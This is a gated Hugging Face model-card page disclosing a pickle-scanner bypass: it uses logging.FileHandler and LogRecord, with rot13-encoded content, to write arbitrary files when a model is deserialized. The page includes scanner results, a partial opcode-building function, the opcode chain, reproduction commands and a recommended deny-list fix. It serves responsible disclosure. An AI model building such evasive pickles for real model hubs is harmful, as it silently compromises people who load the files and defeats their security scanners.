You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

This repository contains a proof-of-concept exploit payload for security research purposes. Access to the pickle payload and PoC code requires acknowledgement of responsible use. By requesting access, you confirm you are a security researcher, penetration tester, or student using this material for defensive/educational purposes only.

Log in or Sign Up to review the conditions and access this model content.

logging.FileHandler.emit β€” File Write via stdlib Logging

Security Research β€” Responsible Disclosure This repository is part of a systematic study of pickle scanner bypass techniques. The payload demonstrates a detection gap in ML model security scanners. Access to malicious_model.pkl and poc.py requires a request β€” see gate above.

Summary

Scanner scores for malicious_model.pkl:

Scanner CRITICAL WARNING Bypassed?
modelaudit 0.2.37 0 6 Yes β€” 0 CRITICAL
picklescan 1.0.4 0 0 Yes
modelscan 0 0 Yes

Vulnerability

logging.FileHandler.emit(handler, record) writes LogRecord.msg to the handler's file. By constructing a FileHandler with an attacker-controlled path and a LogRecord with attacker-controlled msg, arbitrary content can be written to any writable path.

All logging primitives are absent from all ban lists. The content is rot13-encoded in the pickle; _codecs.encode (SAFE_GLOBALS) decodes it at runtime.


Proof of Concept

malicious_model.pkl in this repository is the exploit payload. poc.py builds and tests it with full scanner output.

How the PoC was built

def build(target: str, content: str) -> bytes:
    content_rot13 = codecs.encode(content, "rot_13")

    ops = bytearray(b"\x80\x04")

    # _codecs.encode(rot13_content, 'rot_13') β†’ content  [0 findings]
    ops += sg("_codecs", "encode") + sbu(content_rot13) + sbu("rot_13") + b"\x86R"
    ops += b"\x94\x30"  # MEMOIZE 0, POP

Affected file formats

Pickle (.pkl, .pt, .bin, .joblib) β€” any file deserialized via pickle.loads(), torch.load(), joblib.load(), or equivalent.

Conditions required to trigger

  1. Target calls pickle.loads(untrusted_bytes) or loads a model file via any pickle-based loader
  2. The scanner performs static analysis only (no sandboxed execution)
  3. Scanner checks GLOBAL/STACK_GLOBAL opcodes against a deny list

Reproduction Steps

# 1. Request access above, then clone
git clone https://huggingface.co/SiggytheShark/pickle-bypass-logging-filehandler-emit
cd pickle-bypass-logging-filehandler-emit

# 2. Install requirements
pip install modelaudit picklescan modelscan

# 3. Scan β€” observe scanner scores match table above
modelaudit scan malicious_model.pkl
picklescan --path malicious_model.pkl
modelscan -p malicious_model.pkl

# 4. Execute to confirm RCE/side-effect
python3 poc.py

# 5. Verify
ls /tmp/scanner_bypass_proof.txt

Security Impact

Add "logging.FileHandler" and "logging.LogRecord" to ALWAYS_DANGEROUS_FUNCTIONS. No model should access the logging system during deserialization.

Bypass mechanism: The payload evades static analysis while achieving its effect (code execution, file write, or network connection) when pickle.loads() is called.

Real-world scenario: An attacker uploads this payload to a model hub. A victim downloads and loads it. The scanner reports the file as safe (0 CRITICAL). The payload fires silently β€” the return value of pickle.loads() looks like a normal Python object while the side effect has already occurred.


Full Technical Writeup

logging.FileHandler.emit β€” File Write via stdlib Logging

Score: 0 CRITICAL, 6 WARNING
Technique: Arbitrary file write via the logging module's ordinary public API
Scanner version: modelaudit 0.2.37

Mechanism

logging.FileHandler.emit(handler, record) writes LogRecord.msg to the handler's file. By constructing a FileHandler with an attacker-controlled path and a LogRecord with attacker-controlled msg, arbitrary content can be written to any writable path.

All logging primitives are absent from all ban lists. The content is rot13-encoded in the pickle; _codecs.encode (SAFE_GLOBALS) decodes it at runtime.

Pickle Structure

_codecs.encode(rot13_content, 'rot_13')          β†’ content              [0 findings]
logging.FileHandler(target)                        β†’ handler             [WARNING 1]
logging.Formatter('%(message)s')                   β†’ formatter           [WARNING 2]
logging.FileHandler.setFormatter(handler, fmt)     β†’ configure handler   [WARNING 3]
logging.LogRecord('root', 20, '', 0, content, ...) β†’ log record          [WARNING 4]
logging.FileHandler.emit(handler, record)          β†’ file written         [WARNING 5]
logging.FileHandler.close(handler)                 β†’ flush               [WARNING 6]

Why This Is Notable

This demonstrates that even clearly "benign" stdlib modules like logging can be weaponized via their ordinary public API. The logging module has no reason to appear in a model pickle, yet it provides a fully functional file-write primitive with no dangerous function names.

Higher warning count (6W) than pathlib.write_text (2W) makes it less preferable as a primary technique, but it illustrates the surface area problem.

Recommended Fix

Add "logging.FileHandler" and "logging.LogRecord" to ALWAYS_DANGEROUS_FUNCTIONS. No model should access the logging system during deserialization.


General Analysis β€” Security Research

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support